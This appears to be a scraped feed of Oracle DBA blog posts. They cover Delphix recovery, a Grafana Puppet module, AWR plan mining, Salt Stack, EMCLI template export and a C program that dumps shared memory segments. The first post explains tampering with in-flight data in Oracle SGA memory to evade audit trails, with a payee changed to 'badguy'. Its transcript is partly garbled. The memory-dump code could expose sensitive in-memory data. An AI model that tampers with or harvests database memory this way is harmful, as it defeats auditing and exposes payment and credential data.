Vendors sell some rather expensive software for auditing Oracle database, and coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  
It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.
Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.
PDB1@ORCL> create table payment_batch (payee char(6));
Table created.
PDB1@ORCL> insert into payment_batch values ('vendor');
1 row created.
PDB1@ORCL> select * from payment_batch;
PAYEE------badguy
PDB1@ORCL> commit;
Commit complete.
PDB1@ORCL> alter system flush buffer_cache;
System altered.
PDB1@ORCL> select * from payment_batch;
PAYEE------badguy
You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

12c Index Like Table Statistics Collection (Wearing The Inside Out)

Richard Foote - Wed, 2014-07-09 02:14
This change introduced in 12c has caught me out on a number of occasions. If you were to create a new table: And then populate it with a conventional insert: We find there are no statistics associated with the table until we explicitly collect them: But if we were to now create an index on this […]
Categories: DBA Blogs

Used Delphix to quickly recover ten production tables

Bobby Durrett's DBA Blog - Tue, 2014-07-08 10:24

Yesterday I used Delphix to quickly recover ten production tables that had accidentally been emptied over the weekend.  We knew that at a certain time on Saturday the tables were fully populated and after that some batch processing wrecked them so we created a new virtual database which was a clone of production as of the date and time just before the problem occurred.  We could have accomplished the same task using RMAN to clone production but Delphix spun up the new copy more quickly than RMAN would have.

The source database is 5.4 terabytes and there were about 50 gigabytes of archive logs that we needed to apply to recover to the needed date and time.  It took about 15 minutes to complete the clone including applying all the redo.  The resulting database occupies only 10 gigabytes of disk storage.

If we had used RMAN we would first have to add more disk storage because we don’t have a system with enough free to hold a copy of the needed tablespaces.  Then, after waiting for our storage and Unix teams to add the needed storage we would have to do the restore and recovery.  All these manual steps take time and are prone to human error, but the Delphix system is point and click and done through a graphical user interface (GUI).

Lastly, during the recovery we ran into Oracle bug 7373196 which caused our first attempted recovery to fail with an ORA-00600 [krr_init_lbufs_1] error.  After researching this bug I had to rerun the restore and recovery with the parameter _max_io_size set to 33554432 which is the workaround for the bug.  Had we been using RMAN we probably would have to run the recovery at least twice to resolve this bug.  Maybe we could have started at the point it failed but I’m not sure.  With Delphix it was just a matter of setting the _max_io_size parameter and starting from scratch since I knew the process only took 15 minutes.  Actually it took me two or three attempts to figure out how to set the parameter, but once I figured it out it was so simple I’m not sure why I didn’t do it right the first time.  So, at the end of the day it was just under 3 hours from my first contact about this issue until they had the database up and were able to funnel off the data they needed to resolve the production issue.  Had I been doing an RMAN recover I don’t doubt that I would have worked late into the night yesterday accomplishing the same thing.

- Bobby

P.S. These databases are on HP-UX 11.31 on IA64, Oracle version 11.1.0.7.0.

 

 

Categories: DBA Blogs

Passed the 11g RAC and Grid Expert Exam

Hemant K Chitale - Tue, 2014-07-08 09:08
I passed the 11g RAC and Grid Expert Exam yesterday.
.
For those who are interested :

You must absolutely read the documentation on ASM, Grid Infrastructure and RAC. 

I also recommend 3 books 
1) Pro Oracle Database 11g RAC on Linux -- by Steve Shaw and Martin Bach [Apress Publishing]
2) Oracle 11g R1/R2 Real Application Clusters Essentials -- by Ben Prusinsky and Syed Jaffer Hussain [Packt Publishing] 
OR 
2) Oracle 11g R1/R2 Real Application Clusters Handbook -- by Ben Prusinsky, Guenad Jilveski and Syed Jaffer Husssain [Packt Publishing] 
3) Oracle Database 11g Release 2 High Availability -- by Scott Jesse, Bill Burton and Bryan Vongray [Oracle Press] 

The 11gR2 Grid and RAC Accelerated training at Oracle University is also recommended but expensive.
.
.
.
Categories: DBA Blogs

Making it Easier to Graph Your Infrastructure’s Performance Data

Pythian Group - Tue, 2014-07-08 07:46

Today I would like to share a story with you about the development of a Puppet module for Grafana and its release on the Puppet Forge. But first, I’d like to provide some context so you can understand where Grafana fits in and why I feel this is important.

Those of you that know me have likely heard me talk about the importance of data-driven decision making, and more specifically some of the tools that can be used to help enable individuals to make smart decisions about their IT infrastructure. A common approach is to deploy a graphing system such as Graphite, which stores performance data about your infrastructure to aide you in performing a number of functions including problem diagnosis, performance trending, capacity planning, and data analytics.

If you are unfamiliar with the software, I’ll briefly describe its architecture. Graphite consists of a daemon, called carbon, which listens for time series data and writes it to a fixed-size database called whisper. It also provides a web application to expose the data and allow the user to create and display graphs on demand using a powerful API.

While Graphite does a good job of storing time series data and providing a rich API for visualizing it, one of the things it does not really focus on is providing a dashboard for the data. Thankfully we have Grafana to fill this role and it happens to do it quite well.

If you have ever worked with the ELK stack (Elasticsearch, Logstash, and Kibana) before, Grafana’s interface should be familiar to you, as it is based on Kibana. It is a frontend for Graphite or InfluxDB, and runs as a client side application in your browser. Its only (optional) external dependency is Elasticsearch, as it can use it to store, load and search for dashboards.

Below are some of Grafana’s most notable features (see its feature highlights for a more comprehensive list):

  • Dashboard search
  • Templated dashboards
  • Save / load from Elasticsearch and / or JSON file
  • Quickly add functions (search, typeahead)
  • Direct link to Graphite function documentation
  • Graph annotation
  • Multiple Graphite or InfluxDB data sources
  • Ability to switch between data sources
  • Show graphs from different data sources on the same dashboard

We like to make use of IT automation software whenever possible to deploy tools for our clients. Most tools already have Puppet modules or Chef cookbooks available for them, including the other components of the graphing system: Graphite itself, and a great Python-based collector named Diamond. Grafana, however, had no Puppet module available so I decided to rectify the situation by creating one and publishing it to the Puppet Forge.

The module would be pretty simple: all that is required is to download and extract Grafana into an installation directory, and ensure appropriate values for the Elasticsearch, Graphite and InfluxDB servers / data sources are inserted into its configuration.

I decided to offload the work of downloading and extracting the software to another module, namely gini/archive. And managing the configuration file, config.js, would be done with a combination of module parameters and ERB template.

The only real complication arose when it came time to test serving Grafana with a web server such as Apache or Nginx. I decided not to have my module manage the web server in any way, so I would leverage Puppet Labs’ own Apache module for this purpose.

My test environment consisted of a CentOS virtual machine provisioned by Vagrant and Puppet, with Graphite and Grafana on the same server. I decided to use Daniel Werdermann’s module to deploy Graphite on my virtual machine as it had worked well for me in the past.

I quickly ran into problems with duplicate resources, however, due to the Graphite module managing Apache for creation of its virtual host etc. I moved to separate virtual machines for Graphite and Grafana, and that made my life easier. If you do decide to run both pieces of software on the same server, and are also using Daniel’s module, you can work around the problem by setting gr_web_server to ‘none’ like this:

class { 'graphite':
  gr_web_server			=> 'none',
  gr_web_cors_allow_from_all	=> true,
}

Since my module does not manage Apache (or Nginx), it is necessary to add something like the following to your node’s manifest to create a virtual host for Grafana:

# Grafana is to be served by Apache
class { 'apache':
  default_vhost   => false,
}

# Create Apache virtual host
apache::vhost { 'grafana.example.com':
  servername      => 'grafana.example.com',
  port            => 80,
  docroot         => '/opt/grafana',
  error_log_file  => 'grafana-error.log',
  access_log_file => 'grafana-access.log',
  directories     => [
    {
      path            => '/opt/grafana',
      options         => [ 'None' ],
      allow           => 'from All',
      allow_override  => [ 'None' ],
      order           => 'Allow,Deny',
    }
  ]
}

And the Grafana declaration itself:

class { 'grafana':
  elasticsearch_host  => 'elasticsearch.example.com',
  graphite_host       => 'graphite.example.com',
}

Now that my module was working, it was time to publish it to the Puppet Forge. I converted my Modulefile to metadata.json, added a .travis.yml file to my repository and enabled integration with Travis CI, built the module and uploaded it to the Forge.

Since its initial release, I have updated the module to deploy Grafana version 1.6.1 by default, including updating the content of the config.js ERB template, and have added support for InfluxDB. I am pretty happy with the module and hope that you find it useful.

I do have plans to add more capabilities to the module, including support of more of Grafana’s configuration file settings, having the module manage the web server’s configuration similar to how Daniel’s module does it, and adding a stronger test suite so I can ensure compatibility with more operating systems and Ruby / Puppet combinations.

I welcome any questions, suggestions, bug reports and / or pull requests you may have. Thanks for your time and interest!

Project page: https://github.com/bfraser/puppet-grafana
Puppet Forge URL: https://forge.puppetlabs.com/bfraser/grafana

Categories: DBA Blogs

C program to dump shared memory segments to disk on Linux.

ContractOracle - Tue, 2014-07-08 01:26
The following program was written to help investigate Oracle database shared memory on Linux.  It dumps the contents of existing shared memory segments to files on disk.  Note that it won't work against Oracle 11g and 12C databases as they use mmap instead of shmat for managing shared memory.  Sample program for reading from 11g and 12C here (mmap example )

Compile it using "gcc -o shared shared.c"  It is free for anyone to copy or modify as they wish, but I do not guarantee the functionality.
Check the format of the include listings below as I had to remove hashes and greater-than/less-than symbols to keep blogger happy.
include stdio.h
include stdlib.h
include sys/shm.h

int main (int argc, char *argv[]) {    int maxkey, id, shmid = 0;    struct shm_info shm_info;    struct shmid_ds shmds;    void * shared_data;    FILE * outfile;        maxkey = shmctl(0, SHM_INFO, (void *) &shm_info);    for(id = 0; id <= maxkey; id++) {        shmid = shmctl(id, SHM_STAT, &shmds);        char shmidchar[16];        snprintf(shmidchar, sizeof(shmidchar), "%d", shmid);        if (shmid < 0)            continue;        if(shmds.shm_segsz > 0) {            printf("Shared memory segment %s found.\n",shmidchar);                        shared_data = shmat(shmid, NULL, 0666);            if(shared_data != NULL) {                outfile = fopen(shmidchar, "wb");                if(outfile == NULL) {                    printf("Could not open file %s for writing.", shmidchar);                }                else {                    fwrite(shared_data, shmds.shm_segsz, 1, outfile);                    fclose(outfile);                                        printf("Dumped to file %s\n\n", shmidchar);                }            }        }    }}


Categories: DBA Blogs

It was 12 years ago today…

Richard Foote - Tue, 2014-07-08 01:07
It was exactly 12 years ago today that I first presented my Index Internals – Rebuilding The Truth presentation at a local ACT Oracle User Group event. And so my association with Oracle indexes started. It would be an interesting statistic to know how many people have subsequently read the presentation :) It would no doubt result in […]
Categories: DBA Blogs

Pro-active AWR Data Mining to Find Change in SQL Execution Plan

Pythian Group - Mon, 2014-07-07 11:11

Many times we have been called for the poor performance of a database and it has been narrowed down to a  SQL statement. Subsequent analysis have shown that the execution plan has been changed and a wrong execution plan was being used.

Resolution normally, is to fix the execution plan in 11g by running

variable x number
begin
:x :=
    dbms_spm.load_plans_from_cursor_cache(
    sql_id=>'&sql_id',
    plan_hash_value=>&plan_hash,
    fixed=>'YES');
end;
/

or for 10g, SQL_PROFILE is created as mentioned in Carlos Sierra’s blog .

A pro-active approach can be to mine AWR data for any SQL execution plan changes.

Following query from dba_hist_sqlstat can retrieve the list of SQL IDs whose plans have changed. It orders the SQL IDs,so that those SQL IDs for which maximum gains can be achieved by fixing plan, are listed first.

 
spool sql_with_more_than_1plan.txt
set lines 220 pages 9999 trimspool on
set numformat 999,999,999
column plan_hash_value format 99999999999999
column min_snap format 999999
column max_snap format 999999
column min_avg_ela format 999,999,999,999,999
column avg_ela format 999,999,999,999,999
column ela_gain format 999,999,999,999,999
select sql_id,
       min(min_snap_id) min_snap,
       max(max_snap_id) max_snap,
       max(decode(rw_num,1,plan_hash_value)) plan_hash_value,
       max(decode(rw_num,1,avg_ela)) min_avg_ela,
       avg(avg_ela) avg_ela,
       avg(avg_ela) - max(decode(rw_num,1,avg_ela)) ela_gain,
       -- max(decode(rw_num,1,avg_buffer_gets)) min_avg_buf_gets,
       -- avg(avg_buffer_gets) avg_buf_gets,
       max(decode(rw_num,1,sum_exec))-1 min_exec,
       avg(sum_exec)-1 avg_exec
from (
  select sql_id, plan_hash_value, avg_buffer_gets, avg_ela, sum_exec,
         row_number() over (partition by sql_id order by avg_ela) rw_num , min_snap_id, max_snap_id
  from
  (
    select sql_id, plan_hash_value , sum(BUFFER_GETS_DELTA)/(sum(executions_delta)+1) avg_buffer_gets,
    sum(elapsed_time_delta)/(sum(executions_delta)+1) avg_ela, sum(executions_delta)+1 sum_exec,
    min(snap_id) min_snap_id, max(snap_id) max_snap_id
    from dba_hist_sqlstat a
    where exists  (
       select sql_id from dba_hist_sqlstat b where a.sql_id = b.sql_id
         and  a.plan_hash_value != b.plan_hash_value
         and  b.plan_hash_value > 0)
    and plan_hash_value > 0
    group by sql_id, plan_hash_value
    order by sql_id, avg_ela
  )
  order by sql_id, avg_ela
  )
group by sql_id
having max(decode(rw_num,1,sum_exec)) > 1
order by 7 desc
/
spool off
clear columns
set numformat 9999999999

The sample output for this query will look like

SQL_ID        MIN_SNAP MAX_SNAP PLAN_HASH_VALUE          MIN_AVG_ELA              AVG_ELA             ELA_GAIN     MIN_EXEC     AVG_EXEC
------------- -------- -------- --------------- -------------------- -------------------- -------------------- ------------ ------------
ba42qdzhu5jb0    65017    67129      2819751536       11,055,899,019       90,136,403,552       79,080,504,532           12            4
2zm7y3tvqygx5    65024    67132       362220407       14,438,575,143       34,350,482,006       19,911,906,864            1            3
74j7px7k16p6q    65029    67134      1695658241       24,049,644,247       30,035,372,306        5,985,728,059           14            7
dz243qq1wft49    65030    67134      3498253836        1,703,657,774        7,249,309,870        5,545,652,097            1            2

MIN_SNAP and MAX_SNAP are the minimum/maximum snap id where the SQL statement occurs

PLAN_HASH_VALUE is the hash_value of the plan with the best elapsed time

ELA_GAIN is the estimated improvement in elapsed time by using this plan compared to the average execution time.

Using the output of the above query, sql execution plans can be fixed, after proper testing.  This method can help DBAs pin-point and resolve problems with SQL execution plans, faster.

Categories: DBA Blogs

Salt Stack for Remote Parallel Execution of Commands

Pythian Group - Mon, 2014-07-07 11:08

There are many scenarios when a SysAdmin has to do a “box walk” of the entire infrastructure to execute a command across many servers. This is universally accepted as one of the less glamorous parts of our job. The larger the infrastructure, the longer these box walks take, and the greater chance that human error will occur.

Even giving this task to a junior resource, as is often the case, is not sustainable as the infrastructure grows, and does not represent the best value to the business in terms of resource utilization. Additionally, too much of this type of “grind” work can demoralize even the most enthusiastic team member.

Thankfully the days of having to do these box walks are over. Thanks to configuration management and infrastructure automation tools, the task has been automated and no longer requires the investment in time by a human SysAdmin that it once did. These tools allow you, at a very high level, to off load this repetitive work to the computer, with the computer doing the heavy lifting for you.

 

Introducing Salt Stack

Salt Stack is a distributed remote execution system used to execute commands and query data on remote nodes, either individually or by arbitrary selection criteria. Salt Stack is also a configuration management system in it’s own right but this post will be focusing on Salt from a “Command and Control” point of view.

Salt has 2 main components, the “salt master” (server) and the “salt minions” (clients). Once the minions are accepted by the master, then further execution of commands can come directly from the central salt master server.

Once you have installed your packages the minion needs to be configured to know where its master is. This can be accomplished through a DNS or hosts-file entry or by setting the variable in the /etc/salt/minion config.


master: XXX.XXX.XXX.XXX

Where “XXX.XXX.XXX.XXX” is the IP Address of your master server. Once that is done, and the salt-minion service has been started the minion will generate and ship an SSL key back to the master to ensure all communication is secure.

The master must accept the key from the minion before any control can begin.


# Listing the Keys

[root@ip-10-154-193-216 ~]# salt-key -L
Accepted Keys:
Unaccepted Keys:
ip-10-136-76-163.ec2.internal
Rejected Keys:

# Adding The Key

[root@ip-10-154-193-216 ~]# salt-key -A
The following keys are going to be accepted:
Unaccepted Keys:
ip-10-136-76-163.ec2.internal
Proceed? [n/Y] y
Key for minion ip-10-136-76-163.ec2.internal accepted.

# Nailed It! Now the Master can control the Minion!

[root@ip-10-154-193-216 ~]# salt-key -L
Accepted Keys:
ip-10-136-76-163.ec2.internal
Unaccepted Keys:
Rejected Keys:

Note: Not Shown – I added a 2nd Minion

Now that your master has minions the fun begins. From your master you can now query information from your minions such as disk space:


[root@ip-10-154-193-216 ~]# salt '*' disk.percent

ip-10-136-76-163.ec2.internal:
----------
/:
15%
/dev/shm:
0%
ip-10-147-240-208.ec2.internal:
----------
/:
14%
/dev/shm:
0%

And you can also execute remote commands such as finding out service status, and restarting services.


[root@ip-10-154-193-216 ~]# salt '*' cmd.run "service crond status"

ip-10-136-76-163.ec2.internal:
crond (pid 1440) is running...
ip-10-147-240-208.ec2.internal:
crond (pid 1198) is running...

[root@ip-10-154-193-216 ~]# salt '*' cmd.run "service crond restart"
ip-10-136-76-163.ec2.internal:
Stopping crond: [ OK ]
Starting crond: [ OK ]
ip-10-147-240-208.ec2.internal:
Stopping crond: [ OK ]
Starting crond: [ OK ]

These are only the most basic use cases for what Salt Stack can do, but even from these examples it is clear that salt can become a powerful tool which can reduce the potential for human error and increase the efficiency of your SysAdmin Team.

By Implementing Configuration Management and Infrastructure Automation tools such as Salt Stack you can free up the time of your team members to work on higher quality work which delivers more business value.

Salt Stack (depending on your setup) can be deployed in minutes. On RHEL/CentOS/Amazon Linux using the EPEL repo I was able to be up and running with Salt in about 5 minute on the 3 nodes I used for the examples in this post. Salt can be deployed using another configuration management tool, it can be baked into your provisioning environment, or into base images. If all else fails, (ironically) you can do a box walk to install the package on your existing servers.

Even if you have another configuration management solution deployed, depending on what you are trying to accomplish using Salt for parallel command execution rather then the Config Management system can often prove a much simpler and lightweight solution.

Salt is also a great choice in tools for giving other teams access to execute commands on a subset of boxes without requiring them to have shell access to all of the servers. This allows those teams to get their job done without the SysAdmin team becoming a bottle neck.

Categories: DBA Blogs

Log Buffer #378, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-04 08:43

New technologies, new ideas, and new tips are forthcoming in abundance in numerous blog posts across Oracle, SQL Server, and MySQL. This Log Buffer Edition covers many of the salient ones.

Oracle:

Wither you use a single OEM and migrating to a new OEM or have multiple OEMs, the need to move templates between environments will arise.

Oracle Coherence is the industry’s leading in-memory data grid solution that enables applications to predictably scale by providing fast, reliable and scalable access to frequently used data.

Needless to say, some ATG applications are more complex than others.  Some ATG applications support a single site, single language, single catalog, single currency, have a single development staff, single business team, and a relatively simple business model.

The purpose of this article is to describe some of the important foundational concepts of ATG.

You can use Ops Center to perform some very complex tasks. For instance, you might use it to provision several operating systems across your environment, with multiple configurations for each OS.

SQL Server:

SSRS In a Flash – Level 1 in the Stairway to Reporting Services.

The “Numbers” or “Tally” Table: What it is and how it replaces a loop.

Arshad Ali demonstrates granular level encryption in detail and explains how it differs from Transparent Data Encryption (TDE).

There were many new DMVs added in SQL Server 2012, and some that have changed since SQL Server 2008 R2.

There are some aspects of tables in SQL Server that a lot of people get wrong, purely because they seem so obvious that one feels embarrassed about asking questions.

MySQL:

A much awaited release from the MariaDB project is now stable (GA) – MariaDB Galera Cluster 10.0.12.

Failover with the MySQL Utilities: Part 2 – mysqlfailover.

HowTo: Integrating MySQL for Visual Studio with Connector/Net.

Single database backup and restore with MEB.

Externally Stored Fields in InnoDB.

Categories: DBA Blogs

Speedy #em12c template export

DBASolved - Thu, 2014-07-03 20:50

Wither you use a single OEM and migrating to a new OEM or have multiple OEMs, the need to move templates between environments will arise.  I had this exact problem come up recently at a customer site between an OEM 11g and OEM 12c.  In order to move the templates, I needed to export the multiple monitoring templates using EMCLI.  The command that I used to do individual exports was the following:


./emcli export_template -name="<template name>" -target_type="<target_type>" -output_file="/tmp/<template name>.xml"

If you have only one template to move, the EMCLI command above will work.  If you have more than one template to move, the easiest thing to do is to have the EMCLI command run in a script.  This is the beauty of EMCLI; the ability to interact with OEM at the command line and use it in scripts for repeated executions.  Below is a script that I wrote to export templates based on target_types.

Note: If you need to identify the target_types that are supported by OEM, they can be found in SYSMAN.EM_TARGET_TYPES in the repository.


#!/usr/bin/perl -w
#
#Author: Bobby Curtis, Oracle ACE
#Copyright: 2014
#
use strict;
use warnings;

#Parameters
my $oem_home_bin = "/opt/oracle/app/product/12.1.0.4/middleware/oms/bin";
my @columns = ("", 0, 0, 0, 0);
my @buf;
my $target_type = $ARGV[0];

#Program

if (scalar @ARGV != 1)
{
 print "\nUsage:\n";
 print "perl ./emcli_export_templates.pl <target_type>\n\n";
 print "<target_type> = target type for template being exported\n";
 print "refer to sysman.em_target_types in repository for more info.";
 print "\n";
 exit;
}

system($oem_home_bin.'/emcli login -username=<userid> -password=<password>');
system($oem_home_bin.'/emcli sync');

@buf = `$oem_home_bin/emcli list_templates`;

foreach (@buf)
{
 @columns = split (/ {2,}/, $_);

 if ($columns[2] eq $target_type )
 {
 my $cmd = 'emcli export_template -name="'.$columns[0].'" -target_type="'.$columns[2].'" -output_file="/tmp/'.$columns[0].'.xml"';
 system($oem_home_bin.'/'.$cmd);
 print "Finished export of: $columns[0] template\n";
 }
}

system($oem_home_bin.'/emcli logout');

If you would like to learn more about EMCLI and other ways to use it have a look at these other blogs:

Ray Smith: https://oramanageability.wordpress.com/
Kellyn Pot’Vin: http://dbakevlar.com/
Seth Miller: http://sethmiller.org/

Enjoy!

twitter: @dbasolved

blog: http://dbasolved.com


Filed under: OEM
Categories: DBA Blogs

Partner Webcast - Oracle Coherence & Weblogic Server: Close Integration of Application & Data Grid Tier

Oracle Coherence is the industry’s leading in-memory data grid solution that enables applications to predictably scale by providing fast, reliable and scalable access to frequently used data. The key...

We share our skills to maximize your revenue!
Categories: DBA Blogs